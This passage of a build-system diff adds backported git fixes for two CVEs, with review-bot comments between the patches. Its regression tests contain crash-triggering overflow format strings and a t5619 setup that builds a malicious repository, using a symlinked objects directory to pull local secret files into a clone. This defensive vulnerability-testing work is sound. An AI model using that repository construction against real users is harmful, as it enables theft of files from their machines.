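+ ==26009==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000001168 at pc 0x7f95c4e5f427 bp 0x7ffd8541c900 sp 0x7ffd8541c0a8
+ WRITE of size 2147483649 at 0x603000001168 thread T0
+ #0 0x7f95c4e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+ #1 0x5612bbb1068c in format_and_pad_commit pretty.c:1763
+ #2 0x5612bbb1087a in format_commit_item pretty.c:1801
+ #3 0x5612bbc33bab in strbuf_expand strbuf.c:429
+ #4 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+ #5 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+ #6 0x5612bba0a4d5 in show_log log-tree.c:781
+ #7 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+ #8 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #9 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+ #10 0x5612bb6951a2 in cmd_log builtin/log.c:883
+ #11 0x5612bb56c993 in run_builtin git.c:466
+ #12 0x5612bb56d397 in handle_builtin git.c:721
+ #13 0x5612bb56db07 in run_argv git.c:788
+ #14 0x5612bb56e8a7 in cmd_main git.c:923
+ #15 0x5612bb803682 in main common-main.c:57
+ #16 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #17 0x7f95c4c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #18 0x5612bb5680e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x603000001168 is located 0 bytes to the right of 24-byte region [0x603000001150,0x603000001168)
+ allocated by thread T0 here:
+ #0 0x7f95c4ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x5612bbcdd556 in xrealloc wrapper.c:136
+ #2 0x5612bbc310a3 in strbuf_grow strbuf.c:99
+ #3 0x5612bbc32acd in strbuf_add strbuf.c:298
+ #4 0x5612bbc33aec in strbuf_expand strbuf.c:418
+ #5 0x5612bbb110e7 in repo_format_commit_message pretty.c:1869
+ #6 0x5612bbb12d96 in pretty_print_commit pretty.c:2161
+ #7 0x5612bba0a4d5 in show_log log-tree.c:781
+ #8 0x5612bba0d6c7 in log_tree_commit log-tree.c:1117
+ #9 0x5612bb691ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #10 0x5612bb69235b in cmd_log_walk builtin/log.c:549
+ #11 0x5612bb6951a2 in cmd_log builtin/log.c:883
+ #12 0x5612bb56c993 in run_builtin git.c:466
+ #13 0x5612bb56d397 in handle_builtin git.c:721
+ #14 0x5612bb56db07 in run_argv git.c:788
+ #15 0x5612bb56e8a7 in cmd_main git.c:923
+ #16 0x5612bb803682 in main common-main.c:57
+ #17 0x7f95c4c3c28f (/usr/lib/libc.so.6+0x2328f)
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+ Shadow bytes around the buggy address:
+ 0x0c067fff81d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+ 0x0c067fff81e0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
+ 0x0c067fff81f0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+ 0x0c067fff8200: fd fd fd fa fa fa fd fd fd fd fa fa 00 00 00 fa
+ 0x0c067fff8210: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+ =>0x0c067fff8220: fd fa fa fa fd fd fd fa fa fa 00 00 00[fa]fa fa
+ 0x0c067fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==26009==ABORTING
+
+Now the proper fix for this would be to convert both functions to return
+an `size_t` instead of an `int`. But given that this commit may be part
+of a security release, let's instead do the minimal viable fix and die
+in case we see an overflow.
+
+Add a test that would have previously caused us to crash.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/937b71cc8b5b998963a7f9a33312ba3549d55510]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 8 ++++++++
+ utf8.c | 12 +++++++++---
+ 2 files changed, 17 insertions(+), 3 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 261a6f0..de15007 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -843,4 +843,12 @@ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit mes
+ test_cmp expect actual
+ '
+
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message does not cause allocation failure' '
++ test_must_fail git log -1 --format="%<(1)%B" $huge_commit 2>error &&
++ cat >expect <<-EOF &&
++ fatal: number too large to represent as int on this platform: 2147483649
++ EOF
++ test_cmp expect error
++'
++
+ test_done
+diff --git a/utf8.c b/utf8.c
+index 6632bd2..03be475 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -208,11 +208,12 @@ int utf8_width(const char **start, size_t *remainder_p)
+ */
+ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+- int width = 0;
+ const char *orig = string;
++ size_t width = 0;
+
+ while (string && string < orig + len) {
+- int glyph_width, skip;
++ int glyph_width;
++ size_t skip;
+
+ while (skip_ansi &&
+ (skip = display_mode_esc_sequence_len(string)) != 0)
+@@ -222,7 +223,12 @@ int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ if (glyph_width > 0)
+ width += glyph_width;
+ }
+- return string ? width : len;
++
++ /*
++ * TODO: fix the interface of this function and `utf8_strwidth()` to
++ * return `size_t` instead of `int`.
++ */
++ return cast_size_t_to_int(string ? width : len);
+ }
+
+ int utf8_strwidth(const char *string)
+--
+2.25.1
+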
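Review bot: The regression test added to t4205 is gated on `EXPENSIVE,SIZE_T_IS_64BIT` and uses `$huge_commit`, which is presumably set by the preceding huge-commit test, so a default test run skips it and the overflow path in utf8_strnwidth() goes unexercised. For this backport it is worth running t4205 once with `GIT_TEST_LONG` set, ideally in an AddressSanitizer build as the earlier test's comment suggests, and recording the result with the change. The utf8.c hunk also calls `cast_size_t_to_int()`, which is introduced by patch 06 of this series, so the two must be applied together and in order.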
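--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-10.patch
@@ -0,0 +1,99 @@
+From 81c2d4c3a5ba0e6ab8c348708441fed170e63a82 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:10 +0100
+Subject: [PATCH 10/12] utf8: fix checking for glyph width in strbuf_utf8_replace()
+
+In `strbuf_utf8_replace()`, we call `utf8_width()` to compute the width
+of the current glyph. If the glyph is a control character though it can
+be that `utf8_width()` returns `-1`, but because we assign this value to
+a `size_t` the conversion will cause us to underflow. This bug can
+easily be triggered with the following command:
+
+ $ git log --pretty='format:xxx%<|(1,trunc)%x10'
+
+>From all I can see though this seems to be a benign underflow that has
+no security-related consequences.
+
+Fix the bug by using an `int` instead. When we see a control character,
+we now copy it into the target buffer but don't advance the current
+width of the string.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81c2d4c3a5ba0e6ab8c348708441fed170e63a82]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 7 +++++++
+ utf8.c | 19 ++++++++++++++-----
+ 2 files changed, 21 insertions(+), 5 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index de15007..52c8bc8 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -826,6 +826,13 @@ test_expect_success 'log --pretty with padding and preceding control chars' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty truncation with control chars' '
++ test_commit "$(printf "\20\20\20\20xxxx")" file contents commit-with-control-chars &&
++ printf "\20\20\20\20x.." >expect &&
++ git log -1 --pretty="format:%<(3,trunc)%s" commit-with-control-chars >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+diff --git a/utf8.c b/utf8.c
+index 03be475..ec03e69 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -377,6 +377,7 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ dst = sb_dst.buf;
+
+ while (src < end) {
++ int glyph_width;
+ char *old;
+ size_t n;
+
+@@ -390,21 +391,29 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ break;
+
+ old = src;
+- n = utf8_width((const char**)&src, NULL);
+- if (!src) /* broken utf-8, do nothing */
++ glyph_width = utf8_width((const char**)&src, NULL);
++ if (!src) /* broken utf-8, do nothing */
+ goto out;
+- if (n && w >= pos && w < pos + width) {
++
++ /*
++ * In case we see a control character we copy it into the
++ * buffer, but don't add it to the width.
++ */
++ if (glyph_width < 0)
++ glyph_width = 0;
++
++ if (glyph_width && w >= pos && w < pos + width) {
+ if (subst) {
+ memcpy(dst, subst, subst_len);
+ dst += subst_len;
+ subst = NULL;
+ }
+- w += n;
++ w += glyph_width;
+ continue;
+ }
+ memcpy(dst, old, src - old);
+ dst += src - old;
+- w += n;
++ w += glyph_width;
+ }
+ strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+ strbuf_swap(sb_src, &sb_dst);
+--
+2.25.1
+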
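Review bot: The comment above `if (glyph_width < 0)` in strbuf_utf8_replace() does not say that a control character inside the replaced range is also copied through rather than dropped, because the zeroed `glyph_width` makes the `glyph_width && w >= pos && w < pos + width` condition false. The added t4205 case only places the control bytes before the truncated text, so that behaviour is not pinned by a test. I would extend the comment to `In case we see a control character we copy it into the buffer, even inside the replaced range, but don't add it to the width.` and add a case with a control byte in the truncated part. The function body starts and ends outside these hunks.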
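--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-11.patch
@@ -0,0 +1,90 @@
+From f930a2394303b902e2973f4308f96529f736b8bc Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:15 +0100
+Subject: [PATCH 11/12] utf8: refactor strbuf_utf8_replace to not rely on preallocated buffer
+
+In `strbuf_utf8_replace`, we preallocate the destination buffer and then
+use `memcpy` to copy bytes into it at computed offsets. This feels
+rather fragile and is hard to understand at times. Refactor the code to
+instead use `strbuf_add` and `strbuf_addstr` so that we can be sure that
+there is no possibility to perform an out-of-bounds write.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f930a2394303b902e2973f4308f96529f736b8bc]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ utf8.c | 34 +++++++++++++---------------------
+ 1 file changed, 13 insertions(+), 21 deletions(-)
+
+diff --git a/utf8.c b/utf8.c
+index ec03e69..a13f5e3 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -365,26 +365,20 @@ void strbuf_add_wrapped_bytes(struct strbuf *buf, const char *data, int len,
+ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+ const char *subst)
+ {
+- struct strbuf sb_dst = STRBUF_INIT;
+- char *src = sb_src->buf;
+- char *end = src + sb_src->len;
+- char *dst;
+- int w = 0, subst_len = 0;
++ const char *src = sb_src->buf, *end = sb_src->buf + sb_src->len;
++ struct strbuf dst;
++ int w = 0;
+
+- if (subst)
+- subst_len = strlen(subst);
+- strbuf_grow(&sb_dst, sb_src->len + subst_len);
+- dst = sb_dst.buf;
++ strbuf_init(&dst, sb_src->len);
+
+ while (src < end) {
++ const char *old;
+ int glyph_width;
+- char *old;
+ size_t n;
+
+ while ((n = display_mode_esc_sequence_len(src))) {
+- memcpy(dst, src, n);
++ strbuf_add(&dst, src, n);
+ src += n;
+- dst += n;
+ }
+
+ if (src >= end)
+@@ -404,21 +398,19 @@ void strbuf_utf8_replace(struct strbuf *sb_src, int pos, int width,
+
+ if (glyph_width && w >= pos && w < pos + width) {
+ if (subst) {
+- memcpy(dst, subst, subst_len);
+- dst += subst_len;
++ strbuf_addstr(&dst, subst);
+ subst = NULL;
+ }
+- w += glyph_width;
+- continue;
++ } else {
++ strbuf_add(&dst, old, src - old);
+ }
+- memcpy(dst, old, src - old);
+- dst += src - old;
++
+ w += glyph_width;
+ }
+- strbuf_setlen(&sb_dst, dst - sb_dst.buf);
+- strbuf_swap(sb_src, &sb_dst);
++
++ strbuf_swap(sb_src, &dst);
+ out:
+- strbuf_release(&sb_dst);
++ strbuf_release(&dst);
+ }
+
+ /*
+--
+2.25.1
+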
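Review bot: The `out:` label in strbuf_utf8_replace() sits directly after `strbuf_swap(sb_src, &dst)`, and nothing next to it says that reaching it by `goto` skips the swap, so on that path `sb_src` is left unmodified and whatever was appended to `dst` is discarded. A short comment at the label, for example `/* early exit: sb_src stays as it was, dst is only released */`, would make that contract visible now that the copy logic no longer tracks a write pointer. The `goto out` itself sits between the two hunks and is not shown here.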
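--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-12.patch
@@ -0,0 +1,124 @@
+From 304a50adff6480ede46b68f7545baab542cbfb46 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:23 +0100
+Subject: [PATCH 12/12] pretty: restrict input lengths for padding and wrapping formats
+
+Both the padding and wrapping formatting directives allow the caller to
+specify an integer that ultimately leads to us adding this many chars to
+the result buffer. As a consequence, it is trivial to e.g. allocate 2GB
+of RAM via a single formatting directive and cause resource exhaustion
+on the machine executing this logic. Furthermore, it is debatable
+whether there are any sane usecases that require the user to pad data to
+2GB boundaries or to indent wrapped data by 2GB.
+
+Restrict the input sizes to 16 kilobytes at a maximum to limit the
+amount of bytes that can be requested by the user. This is not meant
+as a fix because there are ways to trivially amplify the amount of
+data we generate via formatting directives; the real protection is
+achieved by the changes in previous steps to catch and avoid integer
+wraparound that causes us to under-allocate and access beyond the
+end of allocated memory reagions. But having such a limit
+significantly helps fuzzing the pretty format, because the fuzzer is
+otherwise quite fast to run out-of-memory as it discovers these
+formatters.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/304a50adff6480ede46b68f7545baab542cbfb46]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 26 ++++++++++++++++++++++++++
+ t/t4205-log-pretty-formats.sh | 24 +++++++++++++++---------
+ 2 files changed, 41 insertions(+), 9 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index c3c1443..e9687f0 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -13,6 +13,13 @@
+ #include "gpg-interface.h"
+ #include "trailer.h"
+
++/*
++ * The limit for formatting directives, which enable the caller to append
++ * arbitrarily many bytes to the formatted buffer. This includes padding
++ * and wrapping formatters.
++ */
++#define FORMATTING_LIMIT (16 * 1024)
++
+ static char *user_format;
+ static struct cmt_fmt_map {
+ const char *name;
+@@ -1029,6 +1036,15 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ if (!*end || end == start)
+ return 0;
+ width = strtol(start, &next, 10);
++
++ /*
++ * We need to limit the amount of padding, or otherwise this
++ * would allow the user to pad the buffer by arbitrarily many
++ * bytes and thus cause resource exhaustion.
++ */
++ if (width < -FORMATTING_LIMIT || width > FORMATTING_LIMIT)
++ return 0;
++
+ if (next == start || width == 0)
+ return 0;
+ if (width < 0) {
+@@ -1188,6 +1204,16 @@ static size_t format_commit_one(struct strbuf *sb, /* in UTF-8 */
+ if (*next != ')')
+ return 0;
+ }
++
++ /*
++ * We need to limit the format here as it allows the
++ * user to prepend arbitrarily many bytes to the buffer
++ * when rewrapping.
++ */
++ if (width > FORMATTING_LIMIT ||
++ indent1 > FORMATTING_LIMIT ||
++ indent2 > FORMATTING_LIMIT)
++ return 0;
+ rewrap_message_tail(sb, c, width, indent1, indent2);
+ return end - placeholder + 1;
+ } else
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 52c8bc8..572d02f 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -809,15 +809,21 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ '
+
+ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
+- cat >expect <<-EOF &&
+- fatal: number too large to represent as int on this platform: 2147483649
+- EOF
+- test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
+- test_cmp expect error &&
+- test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
+- test_cmp expect error &&
+- test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
+- test_cmp expect error
++ printf "%%w(2147483649,1,1)0" >expect &&
++ git log -1 --pretty="format:%w(2147483649,1,1)%x30" >actual &&
++ test_cmp expect actual &&
++ printf "%%w(1,2147483649,1)0" >expect &&
++ git log -1 --pretty="format:%w(1,2147483649,1)%x30" >actual &&
++ test_cmp expect actual &&
++ printf "%%w(1,1,2147483649)0" >expect &&
++ git log -1 --pretty="format:%w(1,1,2147483649)%x30" >actual &&
++ test_cmp expect actual
++'
++
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing padding directive' '
++ printf "%%<(2147483649)0" >expect &&
++ git log -1 --pretty="format:%<(2147483649)%x30" >actual &&
++ test_cmp expect actual
+ '
+
+ test_expect_success 'log --pretty with padding and preceding control chars' '
+--
+2.25.1
+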
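Review bot: In parse_padding_placeholder() the new `FORMATTING_LIMIT` range check runs on `width` after the `strtol()` result has already been stored in it; if `width` is an `int` (its declaration is outside the hunk), an out-of-range number is narrowed first and can land back inside the limit, so the directive would be accepted with a width other than the one written. The value stays bounded either way, so this is about parsing accuracy rather than resource use. Comparing the `long` before narrowing, `long w = strtol(start, &next, 10);` followed by `if (w < -FORMATTING_LIMIT || w > FORMATTING_LIMIT) return 0;`, would reject such input. The function body continues outside the hunk.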
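--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-1.patch
@@ -0,0 +1,179 @@
+From 58325b93c5b6212697b088371809e9948fee8052 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:45 -0500
+Subject: [PATCH 1/3] t5619: demonstrate clone_local() with ambiguous transport
+
+When cloning a repository, Git must determine (a) what transport
+mechanism to use, and (b) whether or not the clone is local.
+
+Since f38aa83 (use local cloning if insteadOf makes a local URL,
+2014-07-17), the latter check happens after the remote has been
+initialized, and references the remote's URL instead of the local path.
+This is done to make it possible for a `url.<base>.insteadOf` rule to
+convert a remote URL into a local one, in which case the `clone_local()`
+mechanism should be used.
+
+However, with a specially crafted repository, Git can be tricked into
+using a non-local transport while still setting `is_local` to "1" and
+using the `clone_local()` optimization. The below test case
+demonstrates such an instance, and shows that it can be used to include
+arbitrary (known) paths in the working copy of a cloned repository on a
+victim's machine[^1], even if local file clones are forbidden by
+`protocol.file.allow`.
+
+This happens in a few parts:
+
+ 1. We first call `get_repo_path()` to see if the remote is a local
+ path. If it is, we replace the repo name with its absolute path.
+
+ 2. We then call `transport_get()` on the repo name and decide how to
+ access it. If it was turned into an absolute path in the previous
+ step, then we should always treat it like a file.
+
+ 3. We use `get_repo_path()` again, and set `is_local` as appropriate.
+ But it's already too late to rewrite the repo name as an absolute
+ path, since we've already fed it to the transport code.
+
+The attack works by including a submodule whose URL corresponds to a
+path on disk. In the below example, the repository "sub" is reachable
+via the dumb HTTP protocol at (something like):
+
+ http://127.0.0.1:NNNN/dumb/sub.git
+
+However, the path "http:/127.0.0.1:NNNN/dumb" (that is, a top-level
+directory called "http:", then nested directories "127.0.0.1:NNNN", and
+"dumb") exists within the repository, too.
+
+To determine this, it first picks the appropriate transport, which is
+dumb HTTP. It then uses the remote's URL in order to determine whether
+the repository exists locally on disk. However, the malicious repository
+also contains an embedded stub repository which is the target of a
+symbolic link at the local path corresponding to the "sub" repository on
+disk (i.e., there is a symbolic link at "http:/127.0.0.1/dumb/sub.git",
+pointing to the stub repository via ".git/modules/sub/../../../repo").
+
+This stub repository fools Git into thinking that a local repository
+exists at that URL and thus can be cloned locally. The affected call is
+in `get_repo_path()`, which in turn calls `get_repo_path_1()`, which
+locates a valid repository at that target.
+
+This then causes Git to set the `is_local` variable to "1", and in turn
+instructs Git to clone the repository using its local clone optimization
+via the `clone_local()` function.
+
+The exploit comes into play because the stub repository's top-level
+"$GIT_DIR/objects" directory is a symbolic link which can point to an
+arbitrary path on the victim's machine. `clone_local()` resolves the
+top-level "objects" directory through a `stat(2)` call, meaning that we
+read through the symbolic link and copy or hardlink the directory
+contents at the destination of the link.
+
+In other words, we can get steps (1) and (3) to disagree by leveraging
+the dangling symlink to pick a non-local transport in the first step,
+and then set is_local to "1" in the third step when cloning with
+`--separate-git-dir`, which makes the symlink non-dangling.
+
+This can result in data-exfiltration on the victim's machine when
+sensitive data is at a known path (e.g., "/home/$USER/.ssh").
+
+The appropriate fix is two-fold:
+
+ - Resolve the transport later on (to avoid using the local
+ clone optimization with a non-local transport).
+
+ - Avoid reading through the top-level "objects" directory when
+ (correctly) using the clone_local() optimization.
+
+This patch merely demonstrates the issue. The following two patches will
+implement each part of the above fix, respectively.
+
+[^1]: Provided that any target directory does not contain symbolic
+ links, in which case the changes from 6f054f9 (builtin/clone.c:
+ disallow `--local` clones with symlinks, 2022-07-28) will abort the
+ clone.
+
+Reported-by: yvvdwf <yvvdwf@gmail.com>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/58325b93c5b6212697b088371809e9948fee8052]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t5619-clone-local-ambiguous-transport.sh | 63 ++++++++++++++++++++++
+ 1 file changed, 63 insertions(+)
+ create mode 100644 t/t5619-clone-local-ambiguous-transport.sh
+
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+new file mode 100644
+index 0000000..7ebd31a
+--- /dev/null
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -0,0 +1,63 @@
++#!/bin/sh
++
++test_description='test local clone with ambiguous transport'
++
++. ./test-lib.sh
++. "$TEST_DIRECTORY/lib-httpd.sh"
++
++if ! test_have_prereq SYMLINKS
++then
++ skip_all='skipping test, symlink support unavailable'
++ test_done
++fi
++
++start_httpd
++
++REPO="$HTTPD_DOCUMENT_ROOT_PATH/sub.git"
++URI="$HTTPD_URL/dumb/sub.git"
++
++test_expect_success 'setup' '
++ mkdir -p sensitive &&
++ echo "secret" >sensitive/secret &&
++
++ git init --bare "$REPO" &&
++ test_commit_bulk -C "$REPO" --ref=main 1 &&
++
++ git -C "$REPO" update-ref HEAD main &&
++ git -C "$REPO" update-server-info &&
++
++ git init malicious &&
++ (
++ cd malicious &&
++
++ git submodule add "$URI" &&
++
++ mkdir -p repo/refs &&
++ touch repo/refs/.gitkeep &&
++ printf "ref: refs/heads/a" >repo/HEAD &&
++ ln -s "$(cd .. && pwd)/sensitive" repo/objects &&
++
++ mkdir -p "$HTTPD_URL/dumb" &&
++ ln -s "../../../.git/modules/sub/../../../repo/" "$URI" &&
++
++ git add . &&
++ git commit -m "initial commit"
++ ) &&
++
++ # Delete all of the references in our malicious submodule to
++ # avoid the client attempting to checkout any objects (which
++ # will be missing, and thus will cause the clone to fail before
++ # we can trigger the exploit).
++ git -C "$REPO" for-each-ref --format="delete %(refname)" >in &&
++ git -C "$REPO" update-ref --stdin <in &&
++ git -C "$REPO" update-server-info
++'
++
++test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++ git clone malicious clone &&
++ git -C clone submodule update --init &&
++
++ test_path_is_missing clone/.git/modules/sub/objects/secret
++'
++
++test_done
+--
+2.25.1
+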
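Review bot: The `Upstream-Status: Backport` tag in this patch header is split from its commit URL, which sits alone on the following line; CVE-2023-22490-2.patch and CVE-2023-22490-3.patch do the same, while the CVE-2022-41903 patches in this commit keep both on one line. Anything that reads the tag line by line may see `Backport` with no reference. I would join them as `Upstream-Status: Backport [https://github.com/git/git/commit/58325b93c5b6212697b088371809e9948fee8052]`, and likewise in the other two files with their own commit URLs.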
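--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
@@ -0,0 +1,122 @@
+From cf8f6ce02a13f4d1979a53241afbee15a293fce9 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:48 -0500
+Subject: [PATCH 2/3] clone: delay picking a transport until after get_repo_path()
+
+In the previous commit, t5619 demonstrates an issue where two calls to
+`get_repo_path()` could trick Git into using its local clone mechanism
+in conjunction with a non-local transport.
+
+That sequence is:
+
+ - the starting state is that the local path https:/example.com/foo is a
+ symlink that points to ../../../.git/modules/foo. So it's dangling.
+
+ - get_repo_path() sees that no such path exists (because it's
+ dangling), and thus we do not canonicalize it into an absolute path
+
+ - because we're using --separate-git-dir, we create .git/modules/foo.
+ Now our symlink is no longer dangling!
+
+ - we pass the url to transport_get(), which sees it as an https URL.
+
+ - we call get_repo_path() again, on the url. This second call was
+ introduced by f38aa83 (use local cloning if insteadOf makes a
+ local URL, 2014-07-17). The idea is that we want to pull the url
+ fresh from the remote.c API, because it will apply any aliases.
+
+And of course now it sees that there is a local file, which is a
+mismatch with the transport we already selected.
+
+The issue in the above sequence is calling `transport_get()` before
+deciding whether or not the repository is indeed local, and not passing
+in an absolute path if it is local.
+
+This is reminiscent of a similar bug report in [1], where it was
+suggested to perform the `insteadOf` lookup earlier. Taking that
+approach may not be as straightforward, since the intent is to store the
+original URL in the config, but to actually fetch from the insteadOf
+one, so conflating the two early on is a non-starter.
+
+Note: we pass the path returned by `get_repo_path(remote->url[0])`,
+which should be the same as `repo_name` (aside from any `insteadOf`
+rewrites).
+
+We *could* pass `absolute_pathdup()` of the same argument, which
+86521ac (Bring local clone's origin URL in line with that of a remote
+clone, 2008-09-01) indicates may differ depending on the presence of
+".git/" for a non-bare repo. That matters for forming relative submodule
+paths, but doesn't matter for the second call, since we're just feeding
+it to the transport code, which is fine either way.
+
+[1]: https://lore.kernel.org/git/CAMoD=Bi41mB3QRn3JdZL-FGHs4w3C2jGpnJB-CqSndO7FMtfzA@mail.gmail.com/
+
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/cf8f6ce02a13f4d1979a53241afbee15a293fce9]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ builtin/clone.c | 8 ++++----
+ t/t5619-clone-local-ambiguous-transport.sh | 15 +++++++++++----
+ 2 files changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/builtin/clone.c b/builtin/clone.c
+index 53e04b1..b57e703 100644
+--- a/builtin/clone.c
++++ b/builtin/clone.c
+@@ -1112,10 +1112,6 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ branch_top.buf);
+ refspec_append(&remote->fetch, default_refspec.buf);
+
+- transport = transport_get(remote, remote->url[0]);
+- transport_set_verbosity(transport, option_verbosity, option_progress);
+- transport->family = family;
+-
+ path = get_repo_path(remote->url[0], &is_bundle);
+ is_local = option_local != 0 && path && !is_bundle;
+ if (is_local) {
+@@ -1135,6 +1131,10 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ }
+ if (option_local > 0 && !is_local)
+ warning(_("--local is ignored"));
++
++ transport = transport_get(remote, path ? path : remote->url[0]);
++ transport_set_verbosity(transport, option_verbosity, option_progress);
++ transport->family = family;
+ transport->cloning = 1;
+
+ transport_set_option(transport, TRANS_OPT_KEEP, "yes");
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+index 7ebd31a..cce62bf 100644
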